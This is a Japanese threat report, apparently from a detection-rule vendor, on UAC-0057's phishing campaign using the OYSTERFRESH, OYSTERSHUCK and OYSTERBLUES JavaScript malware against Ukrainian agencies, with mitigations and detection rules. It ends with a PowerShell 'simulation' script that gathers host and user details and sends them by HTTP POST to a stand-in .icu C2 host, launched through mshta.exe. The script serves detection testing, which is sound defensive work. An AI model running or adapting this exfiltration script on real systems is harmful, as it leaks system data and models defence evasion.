UAC-0057がツールキットをOYSTERFRESH、OYSTERSHUCK、OYSTERBLUESで更新
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
CERT-UAは、ウクライナ政府機関を対象としたフィッシングキャンペーンを報告しています。これらのメールにはPDF添付ファイルが含まれており、受取人をOYSTERFRESH、OYSTERSHUCK、およびOYSTERBLUESと呼ばれる悪意のあるJavaScriptファイルを運ぶZIPアーカイブにリダイレクトします。実行されると、マルウェアはシステム情報を収集し、HTTP POSTリクエストを通じて送信し、後の段階でCobalt Strikeコンポーネントを取得するオプションもあります。支援インフラストラクチャはCloudflareの背後に隠されており、多くの .icu ドメインを使用しています。
調査
CERT-UAの分析により、逆文字列、ROT13、URLデコードなどのデコード方法に依存する悪意のあるJavaScriptサンプルと、持続性を維持するために使用されるレジストリ変更が特定されました。調査官はまた、感染の連鎖に関連する複数のファイルアーティファクトとWindowsのパスを文書化しました。ネットワーク分析は、Cloudflareで保護された .icu ホスティングインフラストラクチャと活動を結びつけています。報告書には、Cobalt Strikeビーコンの可能な後続の配信がさらに記載されています。
緩和策
組織は、標準ユーザーに対する wscript.exe の実行を制限し、PowerShellとJavaScriptの実行を制限し、リストされたレジストリのRunキーの疑わしい変更を監視する必要があります。Webフィルタリングを使用して、 .icu のドメインおよび、適切な場合には、キャンペーンに関連するCloudflare関連のIP範囲をブロックする必要があります。ディフェンダーはまた、最小特権制御を適用し、不明なバイナリの自動実行を防ぐ必要があります。
対応
セキュリティチームは、特定されたファイル名、レジストリキー、および既知のドメインへのアウトバウンドHTTP POSTトラフィックの検出を作成する必要があります。狩猟はまた、 CSBEACON DLLと、 MicrosoftEdgeUpdateTaskMachineと命名されたあらゆるスケジュールタスクを対象とする必要があります。エンドポイント調査は、JavaScriptのデコードおよび実行チェーンを追跡するためのプロセスツリーを収集する必要があります。
攻撃フロー
検出
考えられる持続ポイント [ASEPs – Software/NTUSER Hive] (レジストリイベント経由)
見る
Runキーに追加された疑わしいファイル拡張子 [ASEPs] (レジストリイベント経由)
見る
メールクライアントからの直接アーカイブ抽出(プロセス作成経由)
見る
ZIPアーカイブからの実行 [7zip] (プロセス作成経由)
見る
RARアーカイブからの実行 [WinRAR] (プロセス作成経由)
見る
LOLBAS WScript / CScript(プロセス作成経由)
見る
LOLBAS RunDLL32(コマンドライン経由)
見る
アーカイブからの疑わしい抽出されたファイル(ファイルイベント経由)
見る
疑わしいスケジュールされたタスク(監査経由)
見る
珍しいトップレベルドメイン(TLD)DNSリクエストによる疑わしいコマンドと制御(DNS経由)
見る
IOC(HashSha256)を検出する:更新されたツールキットUAC-0057:OYSTERFRESH、OYSTERSHUCK、OYSTERBLUES パート2
見る
IOC(HashSha256)を検出する:更新されたツールキットUAC-0057:OYSTERFRESH、OYSTERSHUCK、OYSTERBLUES パート1
見る
IOC(HashSha1)を検出する:更新されたツールキットUAC-0057:OYSTERFRESH、OYSTERSHUCK、OYSTERBLUES
見る
IOC(HashMd5)を検出する:更新されたツールキットUAC-0057:OYSTERFRESH、OYSTERSHUCK、OYSTERBLUES パート2
見る
IOC(HashMd5)を検出する:更新されたツールキットUAC-0057:OYSTERFRESH、OYSTERSHUCK、OYSTERBLUES パート1
見る
IOC(SourceIP)を検出する:更新されたツールキットUAC-0057:OYSTERFRESH、OYSTERSHUCK、OYSTERBLUES
見る
IOC(DestinationIP)を検出する:更新されたツールキットUAC-0057:OYSTERFRESH、OYSTERSHUCK、OYSTERBLUES
見る
OYSTERBLUESのエクスフィルトレーションを.icuドメインへのHTTP POST経由で検出 [Windows ネットワーク接続]
見る
wscript.exe経由の悪意のあるJavaScript実行の検出 [Windowsプロセス作成]
見る
シミュレーション実行
必要条件:テレメトリおよびベースラインのプリフライトチェックが成功していること
根拠:このセクションは、検出ルールをトリガーするために設計された攻撃者の技術(TTP)の正確な実行を詳述しています。コマンドとナラティブは、特定されたTTPを直接反映し、検出ロジックによって期待される正確なテレメトリを生成します。
-
攻撃のナラティブとコマンド:
攻撃者は、署名されたWindowsのバイナリ(mshta.exe)を利用して小さなJavaScriptペイロードを実行し、システム情報を収集し、C2サーバーによって制御されている悪意のある“.icu”ドメインにHTTP POSTを介して送信します。この「ランド使用」アプローチは、AVアラートを引き起こすことなく、規則が監視する正確なファイアウォールイベント(POST + “.icu”)を生成します。 -
回帰テストスクリプト:
# OYSTERBLUESスタイルのエクスフィルトレーションシミュレーション # 1. JSONに最小限のシステム情報をエンコード $info = @{ hostname = $env:COMPUTERNAME user = $env:USERNAME os = (Get-CimInstance -ClassName Win32_OperatingSystem).Caption } | ConvertTo-Json -Compress # 2. JSフェッチPOSTを実行する一時的なHTMLファイルを作成 $htmlPath = "$env:TEMPextfilename.html" $js = @" var data = '$info'; fetch('http://malicious-c2.abc.icu/collect', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: data }); "@ Set-Content -Path $htmlPath -Value "<script>$js</script>" -Encoding ASCII # 3. mshta(署名されたバイナリプロキシ実行)経由で実行 Start-Process -FilePath "$env:SystemRootSystem32mshta.exe" -ArgumentList "`"$htmlPath`"" # 4. リクエスト完了の時間の間隔を設定し、次にクリーンアップ Start-Sleep -Seconds 5 Remove-Item -Path $htmlPath -Force -
クリーンアップコマンド:
# 残存するmshtaプロセスがあれば終了 Get-Process -Name mshta -ErrorAction SilentlyContinue | Stop-Process -Force # 残余の一時ファイル(ある場合)を削除 $tempFiles = Get-ChildItem -Path $env:TEMP -Filter "extfilename.html" foreach ($file in $tempFiles) { Remove-Item $file.FullName -Force }